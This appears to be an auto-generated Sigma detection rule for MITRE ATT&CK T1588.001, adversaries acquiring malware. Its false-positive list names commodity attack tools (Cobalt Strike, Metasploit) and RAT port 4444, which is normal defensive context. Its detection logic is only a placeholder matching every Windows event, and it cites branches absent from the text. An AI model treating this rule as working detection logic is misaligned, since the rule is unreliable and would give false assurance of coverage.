title: Malware (T1588.001)
id: df00tech-t1588-001
status: experimental
description: "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities including technology companies specializing in malware development, criminal marketplaces (Malware-as-a-Service), or from individuals. Adversaries may also steal and repurpose malware from third-party entities, including other adversaries."
references:
  - https://attack.mitre.org/techniques/T1588/001/
  - https://df00tech.com/detections/T1588.001
author: df00tech
date: 2026/04/13
tags:
  - attack.t1588.001
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - "Security researchers and red team operators running authorized commodity tooling (Cobalt Strike, Metasploit) on lab or pentest endpoints — these should have change tickets and known source IPs"
  - "Legitimate software using port 4444 or other common RAT ports for non-malicious purposes (some development tools, database management suites, IoT platforms)"
  - "Antivirus/EDR vendors whose product names or detection strings mention malware family names in alert titles, triggering Branch 1 on benign informational telemetry"
  - Automated malware analysis sandbox submissions where known samples are run in controlled environments for detection engineering or threat intel purposes
  - "Binary packing and protection tools (Themida, VMProtect) used legitimately by software vendors may produce behavioral similarities to commodity packer detections"
  - "Software deployment scripts (SCCM, Intune, Ansible) dropping .bin or .dat files to temp locations via cmd.exe or PowerShell may trigger Branch 4"
level: high